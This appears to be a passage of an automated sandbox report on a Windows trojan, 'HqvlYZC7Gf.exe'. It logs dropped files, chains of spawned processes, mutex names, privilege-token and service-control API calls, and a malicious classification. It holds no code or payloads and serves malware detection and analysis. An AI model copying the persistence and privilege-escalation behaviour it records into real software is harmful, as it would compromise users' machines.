Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Windows\SysWOW64\dfwytawqsqtomosmnpgid.gacJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Windows\dfwytawqsqtomosmnpgid.gacJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Windows\SysWOW64\ylnagyfkxguajwlqcprekcjobkyenapu.tviJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Windows\ylnagyfkxguajwlqcprekcjobkyenapu.tviJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040C7E02_2_0040C7E0
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0042797B2_2_0042797B
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041A9362_2_0041A936
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041B3CF2_2_0041B3CF
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004223D82_2_004223D8
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041B4772_2_0041B477
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040F4882_2_0040F488
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0042874A2_2_0042874A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0040F4884_2_0040F488
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0040C7E04_2_0040C7E0
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0042797B4_2_0042797B
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0041A9364_2_0041A936
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0041B3CF4_2_0041B3CF
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004223D84_2_004223D8
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0041B4774_2_0041B477
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0042874A4_2_0042874A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0040C7E05_2_0040C7E0
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0042797B5_2_0042797B
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0041A9365_2_0041A936
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0041B3CF5_2_0041B3CF
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004223D85_2_004223D8
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0041B4775_2_0041B477
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0040F4885_2_0040F488
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0042874A5_2_0042874A
Source: C:\Windows\ojtoccrezqmarmjwql.exeCode function: 6_2_004062356_2_00406235
Source: C:\Windows\ojtoccrezqmarmjwql.exeCode function: 6_2_00404FA86_2_00404FA8
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0042797B19_2_0042797B
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0041A93619_2_0041A936
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0041B3CF19_2_0041B3CF
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_004223D819_2_004223D8
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0041B47719_2_0041B477
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0040F48819_2_0040F488
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0042874A19_2_0042874A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0040C7E019_2_0040C7E0
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: String function: 0041D048 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: String function: 00410BF4 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: String function: 0042203E appears 58 times
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: String function: 00421DB0 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: String function: 00421DF0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: String function: 00413761 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: String function: 0041D048 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: String function: 00410BF4 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: String function: 0042203E appears 58 times
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: String function: 00421DB0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: String function: 00421DF0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: String function: 00413761 appears 92 times
Source: HqvlYZC7Gf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@91/39@511/36
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00413D4D Sleep,GetCurrentProcess,OpenProcessToken,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,2_2_00413D4D
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00413D4D Sleep,GetCurrentProcess,OpenProcessToken,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,4_2_00413D4D
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00413D4D Sleep,GetCurrentProcess,OpenProcessToken,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,5_2_00413D4D
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040604A Sleep,GetTickCount,Sleep,GetTickCount,Sleep,CreateToolhelp32Snapshot,Process32First,EnumWindows,Sleep,Process32Next,CloseHandle,CloseHandle,2_2_0040604A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040901B FindResourceA,LoadResource,LoadResource,LockResource,LockResource,SizeofResource,SizeofResource,UpdateResourceA,LookupIconIdFromDirectoryEx,FindResourceA,LoadResource,LockResource,SizeofResource,UpdateResourceA,LookupIconIdFromDirectoryEx,FindResourceA,LoadResource,LockResource,SizeofResource,UpdateResourceA,LookupIconIdFromDirectoryEx,FindResourceA,LoadResource,LockResource,SizeofResource,UpdateResourceA,FindResourceA,LoadResource,LockResource,SizeofResource,UpdateResourceA,FreeResource,FreeResource,FreeResource,2_2_0040901B
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00413A12 OpenSCManagerA,OpenServiceA,ControlService,ChangeServiceConfigA,CloseServiceHandle,CloseServiceHandle,2_2_00413A12
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Program Files (x86)\dfwytawqsqtomosmnpgid.gacJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeFile created: C:\Users\user\AppData\Local\dfwytawqsqtomosmnpgid.gacJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeMutant created: \Sessions\1\BaseNamedObjects\bzmkbewmkeduommczxkiz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeMutant created: \Sessions\1\BaseNamedObjects\llaatyskkghawwyqppeexcw
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeMutant created: \Sessions\1\BaseNamedObjects\cyxafacyxafacyxafacyxafacy
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeMutant created: \Sessions\1\BaseNamedObjects\srfewatkjeewrqrigftsko
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeJump to behavior
Source: HqvlYZC7Gf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: HqvlYZC7Gf.exeReversingLabs: Detection: 97%
Source: unknownProcess created: C:\Users\user\Desktop\HqvlYZC7Gf.exe "C:\Users\user\Desktop\HqvlYZC7Gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe*"
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess created: C:\Users\user\AppData\Local\Temp\zjisvko.exe "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess created: C:\Users\user\AppData\Local\Temp\zjisvko.exe "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"
Source: unknownProcess created: C:\Windows\ojtoccrezqmarmjwql.exe "C:\Windows\ojtoccrezqmarmjwql.exe" .
Source: C:\Windows\ojtoccrezqmarmjwql.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\ojtoccrezqmarmjwql.exe*."
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe "C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe" .
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\bzmkbewmkeduommczxkiz.exe*."
Source: unknownProcess created: C:\Windows\mjvsikbqngeunkjyurda.exe "C:\Windows\mjvsikbqngeunkjyurda.exe" .
Source: C:\Windows\mjvsikbqngeunkjyurda.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\mjvsikbqngeunkjyurda.exe*."
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe "C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe" .
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\mjvsikbqngeunkjyurda.exe*."
Source: unknownProcess created: C:\Windows\yrzsecpaticodwrc.exe "C:\Windows\yrzsecpaticodwrc.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe "C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe"
Source: unknownProcess created: C:\Windows\mjvsikbqngeunkjyurda.exe "C:\Windows\mjvsikbqngeunkjyurda.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe "C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: unknownProcess created: C:\Windows\yrzsecpaticodwrc.exe "C:\Windows\yrzsecpaticodwrc.exe" .
Source: C:\Windows\yrzsecpaticodwrc.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\yrzsecpaticodwrc.exe*."
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe*"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess created: C:\Users\user\AppData\Local\Temp\zjisvko.exe "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess created: C:\Users\user\AppData\Local\Temp\zjisvko.exe "C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"Jump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\ojtoccrezqmarmjwql.exe*."Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\bzmkbewmkeduommczxkiz.exe*."
Source: C:\Windows\mjvsikbqngeunkjyurda.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\mjvsikbqngeunkjyurda.exe*."
Source: C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\mjvsikbqngeunkjyurda.exe*."
Source: C:\Windows\yrzsecpaticodwrc.exeProcess created: C:\Users\user\AppData\Local\Temp\takyouhoymc.exe "C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\yrzsecpaticodwrc.exe*."
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
